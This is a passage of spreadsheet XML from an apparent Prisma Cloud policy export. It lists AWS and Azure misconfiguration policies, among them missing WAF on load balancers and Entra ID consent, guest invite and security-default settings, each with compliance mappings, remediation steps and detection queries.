          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2145" t="b">
        <v>0</v>
      </c>
      <c r="U2145" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2145" t="inlineStr">
        <is>
          <t>aws-waf-v2-web-acl-resource</t>
        </is>
      </c>
      <c r="W2145" t="inlineStr">
        <is>
          <t>This policy identifies AWS Application Load Balancers (ALBs) that are not configured with AWS Web Application Firewall v2 (AWS WAFv2). As a best practice, configure the AWS WAFv2 service on the application load balancers to protect against application-layer attacks. To block malicious requests to your application load balancers, define the block criteria in the WAFv2 web access control list (web ACL).</t>
        </is>
      </c>
      <c r="X2145" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Make sure your the reported Application Load Balancer requires WAF based on your requirement and Note down the load balancer name.
3. Navigate to WAF &amp; Shield dashboard
4. Click on Web ACLs, under AWS WAF section from left panel
5. If Web ACL is not created; create a new Web ACL and add reported Application Load Balancer to Associated AWS resources.
6. If you have Web ACL already created; Click on Web ACL and add your reported Application Load Balancer to Associated AWS resources. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-public-facing-alb-are-protected-by-waf</t>
        </is>
      </c>
      <c r="Y2145" t="inlineStr"/>
      <c r="Z2145" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-waf-v2-web-acl-resource' AND json.rule = resources.applicationLoadBalancer[*] exists as X; config from cloud.resource where api.name = 'aws-elbv2-describe-load-balancers' AND json.rule = scheme equals internet-facing and type equals application as Y; filter 'not($.X.resources.applicationLoadBalancer[*] contains $.Y.loadBalancerArn)'; show Y;
{"category":"Networking","resourceTypes":["aws_lb","aws_wafregional_web_acl_association"]}</t>
        </is>
      </c>
      <c r="AA2145" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2145" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2145" t="inlineStr">
        <is>
          <t>PC-AWS-WAF-700-CKV2_AWS_28</t>
        </is>
      </c>
      <c r="AD2145" t="b">
        <v>1</v>
      </c>
      <c r="AE2145" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2145" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>7759063b-44f6-41ab-92fa-950f85f4a357</t>
        </is>
      </c>
      <c r="AI2145" t="inlineStr">
        <is>
          <t>44191c88-265d-40ac-af7f-0e78a57d252d</t>
        </is>
      </c>
      <c r="AJ2145" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2145" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2146">
      <c r="A2146" t="inlineStr">
        <is>
          <t>CIS v1.1 (Azure)</t>
        </is>
      </c>
      <c r="B2146" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2146" s="2" t="inlineStr"/>
      <c r="D2146" t="inlineStr"/>
      <c r="E2146" t="inlineStr"/>
      <c r="F2146" t="inlineStr"/>
      <c r="G2146" t="b">
        <v>0</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2146" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2146" t="inlineStr">
        <is>
          <t>Azure Policy for Reltio</t>
        </is>
      </c>
      <c r="L2146" t="inlineStr"/>
      <c r="M2146" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2146" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2146" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2146" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2146" t="inlineStr">
        <is>
          <t>3</t>
        </is>
      </c>
      <c r="R2146" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="S2146" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="T2146" t="b">
        <v>0</v>
      </c>
      <c r="U2146" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2146" t="inlineStr">
        <is>
          <t>azure-active-directory-app-registration</t>
        </is>
      </c>
      <c r="W2146" t="inlineStr"/>
      <c r="X2146" t="inlineStr"/>
      <c r="Y2146" t="inlineStr"/>
      <c r="Z2146" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-active-directory-app-registration' AND json.rule = _DateTime.ageInDays(passwordCredentials[*].endDateTime)&lt; 60 addcolumn passwordCredentials[*].endDateTime</t>
        </is>
      </c>
      <c r="AA2146" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2146" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2146" t="inlineStr"/>
      <c r="AD2146" t="b">
        <v>0</v>
      </c>
      <c r="AE2146" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2146" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>f3768ddf-a1f7-4ad4-bf7a-1464c07640a0</t>
        </is>
      </c>
      <c r="AI2146" t="inlineStr">
        <is>
          <t>b6eb0f9f-3047-4d20-a7cd-194bfdb2c720</t>
        </is>
      </c>
      <c r="AJ2146" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2146" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2147">
      <c r="A2147" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2147" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2147" s="2" t="inlineStr"/>
      <c r="D2147" t="inlineStr"/>
      <c r="E2147" t="inlineStr"/>
      <c r="F2147" t="inlineStr"/>
      <c r="G2147" t="b">
        <v>1</v>
      </c>
      <c r="H21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47" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2147" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2147" t="inlineStr">
        <is>
          <t>Azure user not restricted to create Microsoft Entra Security Group</t>
        </is>
      </c>
      <c r="L2147" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2147" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2147" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2147" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2147" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2147" t="inlineStr">
        <is>
          <t>IAM</t>
        </is>
      </c>
      <c r="R2147" t="inlineStr">
        <is>
          <t>IAM-09</t>
        </is>
      </c>
      <c r="S2147" t="inlineStr"/>
      <c r="T2147" t="b">
        <v>0</v>
      </c>
      <c r="U2147" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2147" t="inlineStr">
        <is>
          <t>azure-active-directory-authorization-policy</t>
        </is>
      </c>
      <c r="W2147" t="inlineStr">
        <is>
          <t>This policy identifies instances in the Microsoft Entra ID configuration where security group creation is not restricted to administrators only.
When the ability to create security groups is enabled, all users in the directory can create new groups and add members to them. Unless there is a specific business need for this broad access, it is best to limit the creation of security groups to administrators only.
As a best practice, it is recommended to restrict the ability to create Microsoft Entra Security Groups to administrators only.</t>
        </is>
      </c>
      <c r="X2147" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Microsoft Entra ID'
2. Select 'Microsoft Entra ID'
3. Under 'Manage' select 'Groups'
4. Under 'Settings' select 'General'
5. Under 'Security Groups' section, set 'Users can create security groups in Azure portals, API or PowerShell' to No
6. Select 'Save'</t>
        </is>
      </c>
      <c r="Y2147" t="inlineStr"/>
      <c r="Z2147" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-active-directory-authorization-policy' AND json.rule = defaultUserRolePermissions.allowedToCreateSecurityGroups is true</t>
        </is>
      </c>
      <c r="AA2147" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2147" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2147" t="inlineStr">
        <is>
          <t>PC-AZR-AD-1261</t>
        </is>
      </c>
      <c r="AD2147" t="b">
        <v>1</v>
      </c>
      <c r="AE2147" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2147" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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47" t="inlineStr">
        <is>
          <t>0db64971-f542-4473-884b-b0523e6b807a</t>
        </is>
      </c>
      <c r="AI2147" t="inlineStr">
        <is>
          <t>38f1f7ad-ac2b-46f5-a9e0-6308ae3e4575</t>
        </is>
      </c>
      <c r="AJ2147" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2147" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2148">
      <c r="A2148" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (Azure), New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1, Copy of Azure Security Benchmark (v3), CIS v1.5.0 (Azure) - Level 1, Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, ITSG-33, Copy of Azure Security Benchmark (v3), CIS Controls v8, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), MTSBv2_Azure, CIS v1.3.0 (Azure), Copy of New Zealand Information Security Manual (NZISM v3.4), testazure, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Azure Security Benchmark (v3), Azure Security Benchmark (v3), CIS v1.4.0 (Azure), CIS Controls v8.1, MLPS 2.0 (Level 2), CIS Controls v7.1, CIS v1.1 (Azure), Copy of CIS v1.2.0 (Azure)</t>
        </is>
      </c>
      <c r="B2148" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2148" s="2" t="inlineStr"/>
      <c r="D2148" t="inlineStr"/>
      <c r="E2148" t="inlineStr"/>
      <c r="F2148" t="inlineStr"/>
      <c r="G2148" t="b">
        <v>1</v>
      </c>
      <c r="H21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48" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2148" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2148" t="inlineStr">
        <is>
          <t>Azure AD Users can consent to apps accessing company data on their behalf is enabled</t>
        </is>
      </c>
      <c r="L2148" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2148" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2148" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2148" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2148" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2148" t="inlineStr">
        <is>
          <t>Identity and Access Management</t>
        </is>
      </c>
      <c r="R2148" t="inlineStr">
        <is>
          <t>1.9</t>
        </is>
      </c>
      <c r="S2148" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2148" t="b">
        <v>0</v>
      </c>
      <c r="U2148" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2148" t="inlineStr">
        <is>
          <t>azure-active-directory-authorization-policy</t>
        </is>
      </c>
      <c r="W2148" t="inlineStr">
        <is>
          <t>This policy identifies Azure Active Directory which have 'Users can consent to apps accessing company data on their behalf' configuration enabled. User profiles contain private information which could be shared with others without requiring any further consent from the user if this configuration is enabled. It is recommended not to allow users to use their identity outside of the cloud environment.</t>
        </is>
      </c>
      <c r="X2148" t="inlineStr">
        <is>
          <t>To configure user consent to apps accessing company data on their behalf, follow the below URL:
https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-user-consent?pivots=portal</t>
        </is>
      </c>
      <c r="Y2148" t="inlineStr"/>
      <c r="Z2148" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-active-directory-authorization-policy' AND json.rule = defaultUserRolePermissions.permissionGrantPoliciesAssigned[*] contains microsoft-user-default-legacy</t>
        </is>
      </c>
      <c r="AA2148" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2148" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2148" t="inlineStr">
        <is>
          <t>PC-AZR-AD-733</t>
        </is>
      </c>
      <c r="AD2148" t="b">
        <v>1</v>
      </c>
      <c r="AE2148" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2148" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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48" t="inlineStr">
        <is>
          <t>84bbc52e-b321-44b7-9c0a-13b34c875f1e</t>
        </is>
      </c>
      <c r="AI2148" t="inlineStr">
        <is>
          <t>3cfcd5e9-c03f-4d65-99f7-8c153ac2e0de</t>
        </is>
      </c>
      <c r="AJ2148" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2148" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2149">
      <c r="A2149" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, NIST 800-53 Rev 5, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2149" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2149" s="2" t="inlineStr"/>
      <c r="D2149" t="inlineStr"/>
      <c r="E2149" t="inlineStr"/>
      <c r="F2149" t="inlineStr"/>
      <c r="G2149" t="b">
        <v>1</v>
      </c>
      <c r="H21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49" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2149" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2149" t="inlineStr">
        <is>
          <t>Azure Guest User Invite not restricted to users with specific admin role</t>
        </is>
      </c>
      <c r="L2149" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2149" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2149" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2149" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2149" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2149" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2149" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S2149" t="inlineStr"/>
      <c r="T2149" t="b">
        <v>0</v>
      </c>
      <c r="U2149" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2149" t="inlineStr">
        <is>
          <t>azure-active-directory-authorization-policy</t>
        </is>
      </c>
      <c r="W2149" t="inlineStr">
        <is>
          <t>This policy identifies instances in the Microsoft Entra ID configuration where guest user invitations are not restricted to specific administrative roles.
Allowing anyone in the organization, including guests and non-admins, to invite guest users can lead to unauthorized access and potential data breaches. This unrestricted access poses a significant security risk.
As a best practice, it is recommended to configure guest user invites to specific admin roles. This will ensure that only authorized personnel can invite guests, maintaining tighter control over access to cloud resources.</t>
        </is>
      </c>
      <c r="X2149" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Microsoft Entra ID'
2. Select 'Microsoft Entra ID'
3. Under 'Manage' select 'External Identities'
4. Select 'External collaboration settings'
5. Under 'Guest invite settings' section, select 'Only users assigned to specific admin roles can invite guest users'
6. Select 'Save'</t>
        </is>
      </c>
      <c r="Y2149" t="inlineStr"/>
      <c r="Z2149" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-active-directory-authorization-policy' AND json.rule = not (allowInvitesFrom equal ignore case adminsAndGuestInviters OR allowInvitesFrom equal ignore case none)</t>
        </is>
      </c>
      <c r="AA2149" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2149" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2149" t="inlineStr">
        <is>
          <t>PC-AZR-AD-1260</t>
        </is>
      </c>
      <c r="AD2149" t="b">
        <v>1</v>
      </c>
      <c r="AE2149" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2149" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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49" t="inlineStr">
        <is>
          <t>4358cedc-99e7-400c-beed-51719ee8d6f1</t>
        </is>
      </c>
      <c r="AI2149" t="inlineStr">
        <is>
          <t>90b422b3-fc5c-43fe-9e9e-1bd0d376148d</t>
        </is>
      </c>
      <c r="AJ2149" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2149" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2150">
      <c r="A2150" t="inlineStr"/>
      <c r="B2150" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2150" s="2" t="inlineStr"/>
      <c r="D2150" t="inlineStr"/>
      <c r="E2150" t="inlineStr"/>
      <c r="F2150" t="inlineStr"/>
      <c r="G2150" t="b">
        <v>1</v>
      </c>
      <c r="H21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50" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2150" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2150" t="inlineStr">
        <is>
          <t>Azure Microsoft Entra ID users can consent to apps accessing company data on their behalf not set to verified publishers</t>
        </is>
      </c>
      <c r="L2150" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2150" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2150" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2150" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2150" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2150" t="inlineStr"/>
      <c r="R2150" t="inlineStr"/>
      <c r="S2150" t="inlineStr"/>
      <c r="T2150" t="b">
        <v>0</v>
      </c>
      <c r="U2150" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2150" t="inlineStr">
        <is>
          <t>azure-active-directory-authorization-policy</t>
        </is>
      </c>
      <c r="W2150" t="inlineStr">
        <is>
          <t>This policy identifies instances in the Microsoft Entra ID configuration where users in your Azure Microsoft Entra ID (formerly Azure Active Directory) can consent to applications accessing company data on their behalf, even if the applications are not from verified publishers.
Allowing unverified applications to access company data increases the likelihood of data breaches and unauthorized access, which could lead to the exposure of confidential information. Using unverified applications can lead to non-compliance with data protection regulations and undermine trust in the organization's data handling practices.
As a best practice, it is recommended to configure the user consent settings to restrict access only to applications from verified publishers.</t>
        </is>
      </c>
      <c r="X2150" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal and search for 'Microsoft Entra ID'
2. Select 'Microsoft Entra ID'
3. Select 'Enterprise Applications'
4. Select 'Consent and permissions'
5. Select 'User consent settings'
6. Under User consent for applications, select 'Allow user consent for apps from verified publishers, for selected permissions (Recommended)'
7. Select Save</t>
        </is>
      </c>
      <c r="Y2150" t="inlineStr"/>
      <c r="Z2150" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-active-directory-authorization-policy' AND json.rule = defaultUserRolePermissions.permissionGrantPoliciesAssigned[*] does not contain "ManagePermissionGrantsForSelf.microsoft-user-default-low"</t>
        </is>
      </c>
      <c r="AA2150" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2150" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2150" t="inlineStr">
        <is>
          <t>PC-AZR-AD-1255</t>
        </is>
      </c>
      <c r="AD2150" t="b">
        <v>1</v>
      </c>
      <c r="AE2150" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2150" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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50" t="inlineStr">
        <is>
          <t>1576f52e-fff7-4fcc-9cb8-d21234a56a67</t>
        </is>
      </c>
      <c r="AI2150" t="inlineStr">
        <is>
          <t>3cb8f309-267f-4755-a869-aebbbd168ed4</t>
        </is>
      </c>
      <c r="AJ2150" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2150" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2151">
      <c r="A2151" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3), MLPS 2.0 (Level 2), Copy of Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v10.0 [Deprecated], CIS v1.2.0 (Azure), Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Azure Security Benchmark (v3), CIS v2.0.0 (Azure) Level 1, CIS v2.1.0 (Azure) Level 1, Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v12, Azure Security Benchmark (v3), HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, Copy of Azure Security Benchmark (v3), CIS Controls v8, Copy of Azure Security Benchmark (v3), Matt's ATT&amp;ACK, MTSBv2_Azure, SOC 2, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, CIS v1.5.0 (Azure) - Level 1, CIS v1.4.0 (Azure), Copy of Azure Security Benchmark (v3), TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), New Zealand Information Security Manual (NZISM v3.4), Azure Security Benchmark (v3), TX-RAMP Level 2, Copy of CIS v1.2.0 (Azure), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS Controls v8.1, Australian Energy Sector Cyber Security Framework (AESCSF), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), Azure Security Benchmark (v3), CIS Controls v7.1, CIS v1.3.0 (Azure)</t>
        </is>
      </c>
      <c r="B2151" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2151" s="2" t="inlineStr"/>
      <c r="D2151" t="inlineStr"/>
      <c r="E2151" t="inlineStr"/>
      <c r="F2151" t="inlineStr"/>
      <c r="G2151" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2151" t="inlineStr">
        <is>
          <t>azure-active-directory</t>
        </is>
      </c>
      <c r="K2151" t="inlineStr">
        <is>
          <t>Azure Active Directory Security Defaults is disabled</t>
        </is>
      </c>
      <c r="L2151" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2151" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2151" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2151" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2151" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2151" t="inlineStr">
        <is>
          <t>Identity and Access Management</t>
        </is>
      </c>
      <c r="R2151" t="inlineStr">
        <is>
          <t>1.22</t>
        </is>
      </c>
      <c r="S2151" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2151" t="b">
        <v>0</v>
      </c>
      <c r="U2151" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2151" t="inlineStr">
        <is>
          <t>azure-active-directory-enforcement-policy</t>
        </is>
      </c>
      <c r="W2151" t="inlineStr">
        <is>
          <t>This policy identifies Azure Active Directory which have Security Defaults configuration disabled. Security Defaults contains preconfigured security settings for common identity-related attacks. This provides a basic level of security-enabled by default. It is recommended to enable this configuration as a security best practice.</t>
        </is>
      </c>
      <c r="X2151" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Azure Active Directory'
3. Select 'Properties' under 'Manage'
4. Click on 'Manage Security defaults' if not selected
5. Under 'Enable Security defaults' select 'Yes' for 'Enable Security defaults'
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2151" t="inlineStr"/>
      <c r="Z2151" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-active-directory-enforcement-policy' AND json.rule = isEnabled is false</t>
        </is>
      </c>
      <c r="AA2151" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2151" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2151" t="inlineStr">
        <is>
          <t>PC-AZR-AD-734</t>
        </is>
      </c>
      <c r="AD2151" t="b">
        <v>1</v>
      </c>
      <c r="AE2151" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2151" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>3aa38d7f-0d5e-466a-883b-771dd4c29f05</t>
        </is>
      </c>
      <c r="AI2151" t="inlineStr">
        <is>
          <t>aa13a679-544f-466b-b0a0-fd1430fa8696</t>
        </is>
      </c>
      <c r="AJ2151" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2151" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2152">
      <c r="A2152" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, CIS v1.4.0 (Azure), APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, NIST CSF v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Matt's ATT&amp;ACK, ISO/IEC 27002:2013, NIST CSF, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27001:2022, ISO 27002:2022, MTSBv2_Azure, ISO/IEC 27018:2019, TX-RAMP Level 1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, CIS v1.2.0 (Azure), ISO/IEC 27002:2013, NIST SP 800-172, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, MITRE ATT&amp;CK v12, ISO/IEC 27017:2015, TX-RAMP Level 2, ITSG-33, NIST 800-53 Rev 5, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Azure Security Benchmark (v3), MITRE ATT&amp;CK v12, Copy of CIS v1.2.0 (Azure), CRI Profile v2.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, CIS v1.3.0 (Azure), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Australian Energy Sector 